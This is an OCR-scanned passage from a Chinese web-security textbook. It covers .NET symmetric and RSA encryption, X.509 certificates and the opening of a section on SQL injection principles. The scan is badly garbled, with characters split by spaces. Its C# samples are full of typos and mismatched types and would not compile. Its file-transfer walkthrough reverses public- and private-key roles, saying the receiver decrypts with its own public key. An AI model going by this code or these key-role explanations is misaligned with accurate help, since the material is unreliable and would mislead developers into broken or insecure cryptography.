对 称 算 法 〈Symmetric Algorithm) ， 有 时 又 叫 传统 密码 算法 ， 就 是 加 密 密 钥 能 够 从 解 
密 密 钥 中 推算 ， 同 时 解密 密 钥 也 可 以 从 加 密 密 钥 中 推算 。 而 在 大 多 数 的 对 称 算 法 中 ， 加 密 
密 钥 和 解密 密 钥 是 相同 的 。 所 以 也 称 这 种 加 密 算法 为 秘密 密 钥 算法 或 单 密 钥 算法 。 它 要 求 
发 送 方 和 接收 方 在 安全 通信 之 前 ， 商 定 一 个 密 钥 。 

对 称 算 法 的 安全 性 依赖 于 密 钥 ， 汇 漏 密 钥 就 意味 着 任何 人 都 可 以 对 他 们 发 送 或 接收 的 
消息 解密 ， 所 以 密 钥 的 保密 性 对 通信 性 至 关 重 要 。 

对 称 算法 的 加 密 强度 也 依赖 于 密 钥 。 如 果 开 发 人 员 配 置 一 个 长 的 密 钥 ， 将 是 非常 难 破 
解 的 。 如 图 4-6 所 示 ， 加 密 和 解密 过 程 都 需要 使 用 同一 密 匙 ， 利 用 加 密 解 密 的 内 存 容 器 
plaintext 和 ciphertext。 




















plaintext A ciphertext 
i A 
decrypt 














图 4-6 对 称 加 密 算法 机 理 


对 称 加 密 算 法 基于 简单 的 数学 操作 ， 工 作 效率 高 。 因 此 当 要 加 密 的 数据 量 非常 大 时 它 
是 最 好 的 选择 。 基 于 对 称 的 加 密 可 以 被 黑客 暴力 破解 ， 但 是 长 的 密 钥 可 以 在 黑客 破解 密码 
的 时 候 保 护 数据 更 长 的 时 间 。 

另外 ， 在 使 用 密 钥 或 密码 对 称 加 密 过 程 中 初始 化 向 量 (Initial Vector，IV) 也 很 重要 。 
IV 被 使 用 在 最 初 的 编码 中 加密 或 者 解密 ) 。 在 所 有 的 对 称 算法 类 中 都 有 Mode 的 属性 ， 
这 是 IV 使 用 的 。 如 果 设 置 Mode 属性 为 CipherMode.CBC (Cipher Block Chaining) ， 则 使 
用 这 个 模式 时 ， 每 个 数据 块 使 用 来 自前 一 个 块 的 值 来 处 理 ， 也 就 是 说 ， 如 果 系 统 处 理 第 三 
块 数据 ， 它 就 会 从 第 二 块 中 取 一 些 信息 。 同 样 ， 它 会 取 第 一 块 数据 中 的 信息 用 来 处 理 第 二 
块 数据 。 但 是 在 第 一 块 数据 之 前 没有 可 以 用 的 块 ， 因 此 它 将 使 用 IV 来 处 理 第 一 块 。 

这 个 技术 确保 没有 两 个 相同 的 块 产生 相同 的 输出 并 且 因 此 使 得 数据 更 安全 。 然 而 如 果 
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使 Mode=CipherModerECB (Electronic codebook mode) ， 则 应 用 程序 就 不 会 使 用 上 面 的 方 
法 (使 用 前 面 的 处 理 的 块 信息 处 理 后 面 的 块 )。 如 果 想 用 很 少 的 资源 和 时 间 处 理 大 量 的 消 
息 ， 那 么 这 个 方法 是 不 错 的 选择 。 

对 称 加 密 算 法 主要 包括 的 算法 如 表 4-4 所 示 。 


表 4-4 对称 加 密 算 法 
默认 实现 类 


算法 名 称 | 算 法 类 | 有 效 密 钥 大 小 /b | 默认 密 钥 大 小 /b 
DES DES 64 64 DESCryptoServiceProvider 


TripleDES TripleDES 128, 192 192 TripleDESCryptoServiceProvider 
RC2 RC2 40~128 128 RC2CryptoServiceProvider 


这 里 需要 注意 的 是 ， 所 有 的 算法 类 都 是 继承 于 抽象 类 SymmetricAlgorithm， 并 且 每 个 
类 都 支持 不 同 大 小 的 密 钥 。 相 同 的 情况 下 ， 它 们 也 支持 不 同 大 小 的 初始 化 向 量 。 

抽象 类 不 能 直接 创建 任何 实例 。 用 SymmetricAlgorithm 类 中 的 共享 Create 方法 可 以 创 
建 加 密实 例 ， 代 码 如 下 : 


TestC mCrypto = SymmetricAlgorithm.Create ("TestC"); 


该 方法 为 创建 者 返回 一 个 TestC 默认 实现 的 实例 ， 而 不 用 去 关心 具体 如 何 实现 TestC 
类 ， 代 码 将 自动 适应 改变 并 正确 的 工作 ， 或 可 能 在 将 来 类 用 托管 代码 写 ， 原 代码 依然 可 以 
接受 。 
对 称 加 密 算法 SymmetricAlgorithm 类 的 方法 和 属性 如 表 4-5 所 示 。 
表 4-5 SymmetricAlgorithm 类 的 方法 和 属性 描述 
属性 和 方法 描述 
分 开 处 理 的 数据 块 的 大 小 ， 大 的 数据 将 被 分 成 小 的 数据 块 处 理 ， 如 果 数 据 小 于 块 大 




















DS 小 ， 则 被 追加 (使 用 一 些 默认 值 填充 ) 

Key 在 处 理 数据 的 时 候 将 要 使 用 密 钥 ， 这 个 密 钥 被 配置 成 使 用 字 节 数组 

IV 数据 处 理 的 时 候 使 用 初始 化 向 量 ， 配 置 成 字 节 数组 

KeySize 密 钥 的 所 有 位 的 大 小 

LegalBlockSize 返回 BlockSize 的 枚 蔡 告 诉 你 判断 包括 最 大 值 ， 最 小 值 和 跳跃 值 在 内 的 块 大 小 ， 跳跃 
值 是 指 下 一 个 判断 值 ， 如 最 小 值 是 32， 跳 跃 值 是 16， 下 一 个 判断 值 就 是 48，64 等 

Mode 位 操作 得 到 或 者 设置 模式 ， 值 是 CipherMode 枚 举 中 的 一 个 

Padding 得 到 或 者 设置 PaddingMode 枚 举 中 的 一 个 追加 值 〈 填 充 块 中 空余 的 区 域 ) 

LegalKeySize 和 LegalBlockSize 一 样 ， 但 处 理 的 是 KeySize 

Create 创建 默认 算法 实现 的 类 的 实例 


CreateEncryptor | 返回 一 个 可 以 手动 加 密 数 据 的 IcryptoTransform 对 象 
CreateDecryptor | 返回 一 个 可 以 手动 解密 数据 的 IcryptoTransform 对 象 











GeneratrKey 。 | 在 加 密 或 解密 的 过 程 中 如 果 Key 和 IV 是 null 则 可 以 产生 默认 的 密 钥 和 IV 
and GeneratelV 

VaildKeySize | 检查 给 定 的 密 钥 是 不 是 算法 的 有 效 密 钥 

Clea 清除 和 消除 所 有 的 资源 以 及 象 密 钥 和 TV 这 样 的 内 存 信息 





在 讲解 具体 加 密 算 法 代码 前 ， 需 要 解释 几 个 概念 : 
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(1) CreateEncryptor 和 CreateDecryptor 方法 。 

SymmetricAlgorithm 类 的 CreateEncryptor 和 CreateDecryptor 方 法 返回 ICryptoTransform 
对 象 。IcryptoTransform 是 一 个 数据 块 处 理 类 来 实现 的 接口 。 过 程 可 以 是 加 密 、 解 密 、 哈 希 、 
基于 64 的 编码 和 解码 等 ， 接 口 的 目的 是 完成 数据 处 理 分 块 。 读 者 可 以 直接 使 用 它 的 实例 ， 
但 是 在 大 多 数 情况 下 ， 为 了 方便 也 通过 CryptoStream 完成 。 

下 面 的 实例 演示 了 如 何 使 用 CryptoStream: 

DES mCrypt = new SymmetricAlgorithm.Create ("DES"); 

ICryptoTransform mTransform = mCrypt.CreateEncryptot (); 

CreateEncryptor 和 CreateDecryptor 是 两 个 重要 的 方法 。 如 果 没 有 任何 参数 传 入 其 中 ， 
那么 将 使 用 默认 的 密 钥 和 IV (使 用 SymmetricAlgoruthm 类 里 面 的 GenerateKey 和 
GenerateIV 方法 ) ， 也 可 以 传 入 一 个 IV 和 密 钥 到 CreateEncryptor 和 CreateDecryptor 的 对 
象 中 ， 使 加 密 和 人 解密 使 用 自己 定义 的 IV 和 密 钥 。 

(2) CryptoStream 类 。 

CryptoStream 类 通常 用 来 读 写 数 据 的 同时 加 密 或 解密 数据 ， 该 类 简单 的 包装 了 一 下 原 
始 流 类 ， 下 面 的 代码 可 以 得 到 它 的 对 象 : 

DES mCrypt = SymmetricAlgorithm.Create ("DES"); 

IcryptoTransform mTransform = mCrypt.CreateEncryptor(); 

CryptoStream mStream = new CryptoSstream(fileSstream,mTransform, 

CryptoStramMode .Read) 

fileStream 请 求 从 硬盘 或 者 内 存 中 读 取 数据 的 原始 文件 的 流 〈 或 是 MemoryStream) ， 
通过 使 用 mStream 对 象 和 StreamReader/StreamWriter 对 象 读 写 数据 ， 读 写 时 加 密 解 密 信息 
将 依赖 IcryptoTransform 对 象 。 

了 解 基本 概念 后 ， 下 面 通过 实例 说 明 利用 DES 对 称 算法 实现 加 密 和 解密 方法 。 

首先 ， 打 开 IDE 创建 一 个 窗 体 ， 并 且 添 加 一 个 文本 输入 控件 txtData 和 命令 按钮 控件 
的 窗 体 ， 代 码 将 要 加 密 TextBox 里 面 的 文本 并 用 MessageBox 显示 。 

命令 按钮 的 单 击 事件 代码 如 下 : 

SymmetricAlgorithm mCryptProv; 

MemoryStream mMemStr; 


// 加 密 txtData 中 的 数据 ,然后 将 加 密 结果 用 MessageBox 显示 并 且 回 写 到 TextBox 中 
// 这 里 可 以 配置 任何 .NET 支持 的 类 

DES mCryptProv = SymmetricAlgorithm.Create ("Rijndael"); 

// 加 密 数据 将 要 以 流 的 形式 存储 在 内 存 中 因此 我 们 需要 内 存 Stream 对 象 
mMemStr = new MemoryStream(); 

// 创建 ICryptTransform 对 象 (在 这 里 使 用 默认 的 密 钥 和 初始 向 量 ) 
ICryptTramsform mTransform = mCryptProv.CreateEncryptor () 7 
CryptoStream mCSWriter = new 

Cryptostream (mMemStr,mTransform,CryptoStreamMode .Write); 
StreamWriter mSWriter = StreamWriter (mCSWriter); 
mSwriter.Writer (this.txtData.Text); 

mSWriter.Flush (); 

mCSWwriter.FlushFinalBlock (); 


需要 注意 的 是 ， 代 码 在 任何 地 方 都 没有 使 用 IV 和 密 钥 ， 这 些 由 .NET 框架 自动 产生 。 
代码 将 加 密 以 后 的 数据 使 用 MemoryStream 写 到 内 存 中 ， 开 发 人 员 从 内 存 中 得 到 数据 。 
当 数 据 已 经 写 入 内 存 需要 回 显 到 TextBox 和 MessageBox 中 ， 需 要 代码 读 取 和 显示 执 
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行 结果 ， 代 码 如 下 : 


// 为 接受 数据 创建 字 节 数组 

byte[] mBytes = new byte [mMemStr-Length - 1]; 
ImMemStr -Position = 0; 

mMemStr .Read (mBytes, 0,mMemStr -Length) 

Text .UTF8Encoding mEnc = new Text.UTF8Encoding(); 
String mEncData = mEnc.GetString (mBytes); 
MessageBox .Show ("加 密 数 据 为 : \n"+mEncData); 
This.txtData.Text = mEncData; 


从 字 节 转换 为 字符 串 可 以 使 用 UTF8Encoding 进行 编码 。 最 后 ， 将 解密 后 的 数据 再 } 
显示 在 MessageBox 和 TextBox 中 ， 其 代码 如 下 : 


// 现在 从 内 存 中 得 到 解密 后 的 数据 

// 因为 数据 在 内 存 中 , 所 以 需要 重新 使 用 MemoryStream 对 象 。 

// 将 内 存 点 置 0 

mMemStr.Position = 0; 

mTransform = mCryptProv.CreateDecryptor(); 
CryptoStream mCSReader = new 

CryptoStream (mMemStr,mTransform,CryptoStreamMode.Read); 
StreamReader mStrReader = new StreamReader (mCSReader); 
String mDecData = mStrReader.ReadToEnd(); 

MessageBox ("解密 数据 为 : \n"+mDecData) ; 

This.txtData.Text = mDecData; 














4.6.2” 非 对 称 加 密 算法 


与 对 称 加 密 算 法 不 同 ， 非 对 称 加 密 算法 需要 两 个 密 钥 : 公开 密 钥 (publickey) 和 私有 
密 钥 (privatekey) 。 公 开 密 钥 与 私有 密 钥 是 一 对 ， 如 果 用 公开 密 钥 对 数据 进行 加 密 ， 只 有 
用 对 应 的 私有 密 钥 才能 解密 ， 如 果 用 私有 密 钥 对 数据 进行 加 密 ， 那 么 只 有 用 对 应 的 公开 密 
钥 才能 解密 ， 所 以 这 种 算法 叫 作 非 对称 加 密 算法 。 

以 加 解密 双方 甲乙 为 例 ， 利 用 非 对 称 加 密 算法 实现 机 密 信 息 交 换 的 基本 过 程 是 ， 甲 生 
成 一 对 密 钥 并 将 其 中 的 一 把 作为 公用 密 钥 向 其 他 贸易 方 公开 ， 得 到 该 公用 密 钥 的 乙 使 用 该 
密 钥 对 机 密 信息 进行 加 密 后 再 发 送 给 甲 。 甲 再 用 自己 保存 的 另 一 把 专用 密 钥 对 加 密 后 的 信 
息 进 行 解密 。 甲 只 能 用 其 专用 密 钥 解密 由 其 公用 密 钥 加 密 后 的 信息 。 

非 对 称 加 密 算法 的 保密 性 较 好 ， 消 除了 最 终 用 户 交换 密 钥 的 需要 ， 但 加 密 和 解密 花费 
时 间 长 、 速 度 慢 ， 不 适合 于 对 文件 加 密 。 

在 微软 公司 的 Window 安全 性 体系 结构 中 ， 公 开 密 钥 系 统 主要 用 于 对 私有 密 钥 的 加 密 
过 程 。 每 个 用 户 如 果 想 要 对 数据 进行 加 密 ， 都 需要 生成 一 对 自己 的 密 钥 对 (keypair) 。 密 
钥 对 中 的 公开 密 钥 和 非 对 称 加 密 解密 算法 是 公开 的 ， 但 私有 密 钥 则 应 该 由 密 钥 的 主人 妥善 
保管 。 

使 用 公开 密 钥 对 文件 进行 加 密 传输 的 实际 过 程 包括 4 步 : 

(1) 发 送 方 生成 一 个 自己 的 私有 密 钥 并 用 接收 方 的 公开 密 钥 对 自己 的 私有 密 钥 进行 加 
密 ， 然 后 通过 网 络 传输 到 接收 方 。 

(2) 发 送 方 对 需要 传输 的 文件 用 自己 的 私有 密 钥 进行 加 密 ， 然 后 通过 网 络 把 加 密 后 的 
文件 传输 到 接收 方 。 



































。70 。 


第 4 章 存储 的 安全 


(3) 接收 方 用 自己 的 公开 密 钥 进行 解密 后 得 到 发 送 方 的 私有 密 钥 。 

(4) 接受 方 用 发 送 方 的 私有 密 钥 对 文件 进行 解密 得 到 文件 的 明文 形式 。 

因为 只 有 接收 方才 拥有 自己 的 公开 密 钥 ， 所 以 即使 其 他 人 得 到 了 加 密 后 发 送 方 的 私有 
密 钥 ， 也 无 法 进行 解密 ， 从 而 保证 了 私有 密 钥 的 安全 性 ， 也 保证 了 传输 文件 的 安全 性 。 实 
际 上 ， 在 文件 传输 过 程 中 实现 了 两 个 加 密 解密 过 程 。 文 件 本 身 的 加 密 和 解密 与 私有 密 钥 的 
加 密 解 密 ， 这 分 别 通过 私有 密 钥 和 公开 密 钥 来 实现 。 

整个 加 解密 流程 如 图 4-7 所 示 。 




















字符 中 
明文 
一 通过 Encoding 指 定 不 
同 的 代码 页 ， 把 字符 人 neodne 


申 转 成 不 同 代码 页 对 a 


byte[] 形 式 





图 4-7 对 称 加 密 算法 机 理 


非 对 称 算法 在 Web 系统 验证 模块 上 经 常 被 使 用 , 如 高 密级 文件 在 线 传输 , 聊天 加 密 等 。 
下 面 的 实例 使 用 NET 程序 对 非 对 称 加密 算 法 ， 以 及 如 何在 .NET 里 使 用 非 对 称 (RSA) 算 
法 加 密 解 密 用 户 数据 。RSA 的 加 解密 过 程 主要 是 创建 两 个 RSA 对 象 rsal 和 rsa2， 要 rsa2 
发 送 一 段 信息 给 rsal， 则 先 由 rsal 发 送 “ 公 钥 ” 给 rsa2。rsa2 获取 得 公 钥 之 后 ， 加 密 要 发 
送 的 数据 内 容 。rsal 获取 加 密 后 的 内 容 后 ， 用 自己 的 私 钥 解密 ， 得 出 原始 的 数据 内 容 。 
实例 代码 如 下 : 


using System; 
using System-IO7 
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using System.Text; 
using System.Security.Cryptography; 
/// <summary> 
/// </summary> 
class Classl 
public static void Main(string[] args) 
{ 
Classl c=new Class]l (); 
c.StartDemo(); 
: 


public void StartDemo () 

{ 
RSACryptoServiceProvider rsal 
RSACryptoServiceProvider rsa2 
string publickey; 
// 导出 rsal 的 公 钥 
publickey=rsal.ToXmlString (false); 
string plaintext; 
// 原始 数据 
Plaintext=" 你 好 吗 ? 这 是 用 于 测试 的 字符 串 。"; 
Console.WriteLine ("原始 数据 是 : \n{0}\n",plaintext); 
rsa2.FromXxmlstring (publickey); // rsa2 导入 rsal 的 公 钥 ,用 于 加 密 信息 
// rsa2 开始 加 密 
byte[] cipherbytes; 
cipherbytes=rsa2.Encrypt( Encoding.UTF8.GetBytes (Plaintext)，false) 


new RSACryptoServiceProvider(); 
new RSACryptoServiceProvider(); 


ERE RA RA 

Console.WriteLine ("加 密 后 的 数据 是 : ") ; 

for (int i=0; i< cipherbytes.Length; i++) 

{ 
Console.Write("{0:X2} ",cipherbytes); 

1 

Console.WriteLine("\n"); 

VANTAGE 

// rsal 开始 解密 

byte[] plaintbytes; 

plaintbytes = rsal.Decrypt (cipherbytes, false); 


Console.WriteLine ("解密 后 的 数据 是 : ") ; 
Console.WriteLine (Encoding .UTF8.GetString (plaintbytes)); 





Console.ReadLine (); 
} 
| 


4.6.3 ”证 书 加 密 


无 论 是 基于 JSP 或 ASP.NET 技术 的 系统 中 都 会 需要 创建 基于 HTTPS 的 高 安全 信道 ， 
如 电子 商务 系统 、 结 算 系统 等 。 

该 技术 通常 向 用 户 传送 公 钥 ,使 用 的 分 发 机 制 称 为 证 书 。 通常 证 书 颁发 机 构 (CA) 对 
证 书 进行 签名 ， 以 便 确认 公 钥 来 自 声称 发 送 公 钥 的 主体 。 

证 书 存放 在 称 为 “证 书 存 储 ” 的 安全 位 置 中 。“ 证 书 存储 ”包含 证 书 、CRL 和 证 书信 
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任 列 表 (CTL) ， 每 个 用 户 都 有 存储 证 书 的 个 人 存储 〈 称 为 “我 的 存储 ”) 。 
虽然 可 以 将 任何 证 书 存储 在 “我 的 存储 ”中 ， 但 应 该 将 此 存储 专用 于 存储 用 户 的 个 人 
证 书 ， 即 用 于 签名 和 解密 该 特定 用 户 消息 的 证 书 。 

除了 “我 的 存储 ”外 ，Windows 还 维护 以 下 证 书 存储 : CA 和 根 。 此 存储 包含 特定 证 
书 颁发 机 构 (用 户 信 任 其 向 其 他 用 户 颁发 证 书 ) 的 证 书 。 操 作 系统 提供 了 一 套 受 信任 的 CA 
证 书 ， 管 理 员 还 可 以 添加 其 他 的 证 书 ， 如 包含 用 户 与 之 交换 签名 消息 其 他 用 户 的 证 书 。 

图 4-8 所 示 为 证 书 认证 的 顺序 。 











甲 将 证 书 发 送 给 乙 


消息 (使 用 私 钥 签名 ) 

















请 求证 书 验证 签名 











证 书 授权 





图 4-8 证 书 加 密 算 法 机 理 


(1) 甲 将 一 个 签名 的 证 书 请 求 〈 包 含 他 的 名 字 、 公 钥 、 可 能 还 有 其 他 一 些 信息 ) 发送 
到 CA。 

(2) CA 使 用 甲 的 请 求 创建 一 个 消息 ，CA 使 用 其 私 钥 对 消息 进行 签名 ， 将 消息 和 签名 
返回 给 甲 ， 消 息 和 签名 共同 构成 了 甲 的 证 书 。 
(3) 甲 将 证 书 发 送 给 乙 ， 以 便 授 权 乙 访问 甲 的 公 钥 。 
(4) 乙 使 用 CA 的 公 钥 对 证 书签 名 进行 验证 ， 如 果 证 明 签 名 是 有 效 的 ， 乙 就 承认 证 书 
中 的 公 钥 是 甲 的 公 钥 。 

与 数字 签名 的 情况 相同 ， 任 何 有 权 访 问 CA 公 钥 的 接收 者 都 可 以 确定 证 书 是 否 由 特定 
CA 签名 ， 这 个 过 程 不 要 求 访问 任何 机 密 信息 。 上 面 这 个 方案 假定 乙 有 权 访 问 CA 的 公 钥 ， 
如 果 乙 拥有 包含 该 公 钥 的 CA 证 书 的 副本 ， 则 乙 有 权 访 问 该 密 

在 了 解 了 证 书 基本 概念 后 , 需要 帮助 读者 进一步 了 解 如 何 结合 NET 技术 实现 基于 证 书 
的 加 密 技术 。 

Intemet 上 有 很 多 提供 验证 服务 的 机 构 ， 比 较 流 行 的 有 VeriSign。 在 Intranet 中 使 用 
Windows Server 中 的 证 书 服务 运行 自己 的 CA 服务 。 

X.509 是 一 种 较 常用 的 证 书 标准 ， 如 Linux 和 Windows 的 Authenticode 技术 与 SSL 技 
术 都 是 使 用 的 X.509 证 书 标准 。.NET Framework SDK 中 提供 了 makecert 这 个 生成 证 书 的 
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工具 用 于 制作 测试 证 书 。 

如 下 命令 会 产生 一 个 名 为 test.cer 的 证 书 : 

mskecert -n CN=Test test.cer 

双击 此 证 书 可 以 看 到 证 书 详细 内 容 ， 如 图 4-9 所 示 。 


常规 。 | 详细 信息 | 证 书 路 径 | 


证 书信 息 


这 个 证 书 的 目的 是 : 
* 保证 远程 计算 机 的 身份 
* 向 远程 计算 机 证 明 您 的 身份 
* 确保 软件 来 自 软 件 发 行商 
* 保护 软件 在 发 行 后 不 被 改动 。 











颁发 给 : ” 杨 云 
颁发 者 : 。 安全 测试 


有 效 期 起 始 日 期 2004-7-1 到 2010-7-4 


E13 预 发 者 说 明 扣 ) | 





图 4-9 证 书 详细 信息 


在 .NET 框架 中 System.Security.Cryptography.X509Certificates 下 提供 了 专门 处 理 X.509 

证 书 的 类 。 
下 面 的 实例 说 明证 书 文件 的 读 取 ， 以 及 证 书 对 象 基本 方法 的 使 用 。 代 码 创建 指定 证 书 

的 对 象 ， 并 且 输 出 关于 证 书 的 安全 加 密 信 息 。 

代码 中 的 主 函数 Main 用 于 输出 演示 结果 。 方 法 FindKeyLocation 用 于 定位 密 钥 文件 ， 
其 名 称 为 test， 存 放 路 径 是 用 户 个 人 文件 夹 。 方 法 GetKeyFileName 用 于 输出 该 证 书 的 相关 

程序 代码 如 下 : 

using System.Security.Cryptography; 

using System.Security.Cryptography.X509Certificates; 

namespace LeastPrivilege.Tools 


class Program 
static void Main(string[] args) 


{ 

// 指定 证 书 保存 位 置 

StoreLocation location = StoreLocation.CurrentUser; 
if (args.Length != 0) 

location = StoreLocation.LocalMachine; 

// 创建 证 书 存储 对 象 

X509Store store = new X509Store ( 
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StoreName.My, 
location); 
store.Open (OpenFlags.ReadOonly); 
// 选择 证 书 
X509Certificate2Collection col =X509Certificate2UI.SelectFrom- 
Collection( 
store.Certificates, 
"test", // 名 称 
"Select a Certificate", 
X509SelectionFlag.SingleSelection); 
store.Close(); 
if {col Count l= 1) 
return; 
// 返回 证 书信 息 
string keyfileName = GetKeyFileName (col[0]); 
string keyfilePath FindKeyLocation (keyfileName); 
// 显示 属性 信息 
// (interop code omitted). 
ShellEx.ShowFilePropertiesDialog( 
IntPtr.Zero, 
keyfilePath, 
keyfileName); 
Console.WriteLine ("Press enter to continue"); 
Console.ReadLine(); 

} 
private static string FindKeyLocation (string keyFileName) // 获取 证 书 
{ 
// 检测 机 器 路 径 
string machinePath = Environment .GetFolderPath 

(Environment .SpecialFolder.CommonApplicationData); 
string machinePathFull = machinePath +@" \Crypto\RSA\MachineKeys"; 
// 获取 证 书 文件 

string[] machineFiles = Directory.GetFiles( 
machinePathFull, 

keyFileName); 

if (machineFiles.Length > 0) 
return machinePathFull; 
// 检测 用 户 路 径 

string userPath = Environment .GetFolderPath 

(Environment .SpecialFolder.ApplicationData); 

string userPathFull = userPath + @"\Microsoft\Crypto\RSA\"; 
string[] userDirectories = Directory.GetDirectories (userPathFull); 
if (userDirectories.Length > 0)// 判断 路 径 有 效 性 

{ 

string[] userDirClone = userDirectories; 
for(int i = 0; i < userDirClone.Length; i++) 

{ 

string dir = userDirClone[i]; 

userDirectories = Directory.GetFiles( 
dir; 
keyFileName); 
if(userDirectories.Length != 0) 
return dir; 

} 

} 
return null; 

} 
private static string GetKeyFileName (X509Certificate2 cert)// 输出 证 书信 息 
{ 


string filename = null; 
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if (cert.PrivateKey != null) 

: 

RSACryptoServiceProvider provider = cert.PrivateKey as 
RSACryptoServiceProvider; 

filename = provider.CspKeyContainerInfo. 
UniqueKeyContainerName; 


} 
// 证 书 哈 希 字 串 


Console.WriteLine("hash = {0}", cer.GetCertHashstring()); 


Console.WriteLine ("effective Date = {0}", cer.GetEffectiveDateString()); 
// 证 书 期 限 
Console.WriteLine ("expire Date = {0}", cer.GetExpirationDatestring()); 
// 证 书 定义 
Console.WriteLine("Issued By = {0}", cer.Issuer); 
// 证 书 名 称 
Console.WriteLine("Issued To = {0}", cer.Subject); 
// 证 书 密 钥 算法 
Console.WriteLine("algo = {0}", cer.GetKeyAlgorithm()); 
// 证 书 公 钥 算 法 
Console.WriteLine("Pub Key = {0}", cer.GetPublicKeyString()); 
} 


return filename; 


} 


在 使 用 证 书 加 密 Web 信息 时 ， 需 要 读者 注意 根 证 书 。 因 为 Windows 系统 维护 了 一 个 
证 书 的 列表 ， 称 为 证 书 存储 区 (Certificate Store) 。 包 含 在 该 列表 中 的 证 书 被 称 为 根 证 书 ， 
它 是 由 Windows 系统 默认 提供 的 。 如果 CA 的 证 书 是 一 个 根 证 书 ，Windows 就 不 再 需要 通 
过 网 络 访问 CA 以 验证 证 书 的 有 效 性 ， 因 为 本 机 上 已 存 有 这 类 CA 证 书 。 通 过 各 CA 的 层 
级 验证 可 以 形成 一 个 证 书 链 ， 从 而 最 大 程度 避免 机 器 在 安装 期 间 与 CA 联系 。 
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在 Web 系统 中 , 数据 库 扮演 着 越 来 越 重 要 的 角色 , 没有 数据 库 的 支持 就 无 法 完成 巨 量 
的 数据 流转 。 但 这 样 一 来 也 为 黑客 留 下 了 很 大 空间 ， 很 多 黑客 攻击 和 数据 丢失 事件 都 是 从 
数据 库 切 入 的 。 

通过 本 章 能 够 学 习 加 固 Web 系统 与 数据 库 之 间 的 通道 ， 减 少 黑客 利用 Web 系统 侵入 
和 窍 取 数据 的 机 会 。 





5.1 数据 库 与 注入 隐患 


如 今 的 互联 网 系统 , 不 管 是 JSP、ASP.NET 还 是 PHP 技术 都 免不了 使 用 一 些 用 户 输入 
的 信息 以 达到 信息 的 沟通 。 但 用 户 输入 信息 种 类 繁多 ， 其 中 不 乏 一 些 黑客 的 试探 数据 。 

在 Web 开发 中 ， 安 全 性 都 是 开发 人 员 要 考虑 的 一 个 重要 要 素 。 在 Web 应 用 程序 中 ， 
确保 安全 性 是 一 个 重要 而 复杂 的 问题 。ASP.NET 应 用 程序 的 安全 性 通常 界定 为 在 其 上 运行 
的 计算 机 的 配置 ， 以 及 诸如 数据 库 之 类 的 连接 资源 。 这 就 需要 对 特定 文件 夹 、 文 件 、 组 件 
和 其 他 资源 进行 限制 访问 ， 以 及 给 合适 的 用 户 授 权 ， 以 便 他 们 能 访问 请 求 的 资源 。 

一 般 来 讲 ， 可 用 ASP.NET 本 身 提供 的 身份 验证 、 授 权 、 角 色 扮 演 、IIS 自 带 的 NTFS 
权限 和 委托 技术 来 增强 Web 应 用 程序 和 服务 器 的 安全 性 。 但 当 SQL 注入 攻击 发 生 时 ， 这 
些 技 术 对 于 保护 数据 库 安全 就 远 远 不 够 的 了 。 本 节 将 重点 讨论 攻击 者 使 用 SQL 注入 攻击 的 
原理 ， 并 结合 实例 提出 防范 措施 。 

SQL 注入 是 一 种 Web 应 用 程序 的 安全 漏洞 ， 攻 击 者 可 以 通过 它 将 恶意 数据 提交 给 应 
用 程序 ， 欺 骗 应 用 程序 在 服务 器 上 执行 恶意 的 SQL 命令 。 理论 上 讲 ， 这 种 攻击 一 般 可 以 预 
防 , 但 由 于 其 允许 攻击 者 直接 运行 针对 用 户 关 键 数据 的 数据 库 命令 , 从 而 成 为 一 种 常见 的 、 
危害 性 大 的 攻击 形式 。 在 极端 情况 下 ， 攻 击 者 不 但 能 够 自由 地 控制 用 户 的 数据 ， 还 可 以 删 
除数 据 表 和 数据 库 ， 甚 至 控制 整个 数据 库 服务 器 。 

如 果 这 种 攻击 容易 预防 ， 那 么 为 什么 还 如 此 危险 呢 ? 由 于 众所周知 的 经 济 上 的 原因 ， 
用 户 的 应 用 数据 库 对 黑客 来 说 非常 诱 人 ， 他 们 可 以 引起 攻击 者 的 极 大 注意 。 如 果 在 Web 
应 用 程序 中 可 能 存在 SQL 注入 漏洞 攻击 者 来 说 是 很 容易 检测 到 并 利用 它 。 显然 , 即使 SQL 
注入 错误 并 不 是 开发 人 员 最 经 常 犯 的 错误 ， 但 是 一 旦 发 生 就 很 容易 被 发 现 和 利用 。 

攻击 者 检测 SQL 注入 漏洞 的 一 个 简单 方法 是 在 输入 中 插入 一 个 元 字符 
(meta-character) ， 应 用 程序 会 用 这 个 字符 生成 一 个 数据 库 访 问 语句 。 例 如 ， 在 任何 包含 一 
个 搜索 输入 栏 的 Web 站 点 上 ， 攻 击 者 可 以 输入 一 个 数据 库 元 字符 ， 如 一 个 核对 符号 0， 然 
后 单 击 “ 搜 索 ” 按 钮 提交 输入 。 

如 果 应 用 程序 返回 一 个 数据 库 错 误 消 息 ， 攻 击 者 不 但 会 知道 已 经 发 现 了 一 个 应 用 程序 
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的 数据 库 驱 动 部 分 ， 而 且 能 注入 更 有 意义 的 命令 ， 让 服务 器 执行 。 应 用 程序 安全 研究 员 
Michael Sutton 近来 的 研究 表明 ， 发 现 那些 易于 受到 SQL 攻击 的 站 点 是 很 容易 的 。 使 用 
Google 搜索 这 种 API 方法 只 需 几 分 钟 ， 就 可 以 确定 大 量 的 潜在 的 易 受 攻击 的 站 点 。 


5.1.1 攻击 原理 


SQL 注入 攻击 是 当今 最 危险 、 最 普遍 的 基于 Web 的 攻击 之 一 。 所 谓 注 入 攻击 ， 就 是 
攻击 者 把 SQL 命令 插入 到 Web 表单 的 输入 域 或 页 面 请 求 的 查询 字符 串 中 ， 欺 骗 服 务 器 执 
行 恶 意 的 SQL 命令 。 

在 某 些 表单 中 ， 用 户 输入 的 内 容 直 接 用 来 构造 (或 影响 ) 动态 SQL 命令 或 作为 存储 过 
程 的 输入 参数 ， 这 类 表单 特别 容易 受到 SQL 注入 攻击 。SQL 注入 攻击 的 要 诀 在 于 将 SQL 
的 查询 /行为 命令 通过 “嵌入 ”的 方式 放 入 合法 的 HTTP 提交 请 求 中 ， 从 而 达到 攻击 者 的 某 
种 意图 ， 接 着 通过 运用 一 些 特权 登录 ， 让 恶意 用 户 通过 程序 在 数据 库 上 执行 命令 。 

常见 的 SQL 注入 攻击 过 程 如 下 : 

(1) 程序 员 用 ASPNET 写 了 一 个 Web 应 用 登录 页 面 。 这 个 登录 页 面 控 制 用 户 是 否 有 
权 访 问 应 用 ， 它 要 求 用 户 输入 一 个 用 户 名 和 密码 。 

(2) 登录 页 面 中 输入 的 内 容 将 直接 用 来 构造 动态 的 SQL 命令 或 直接 用 作 存 储 过 程 的 
参数 。 

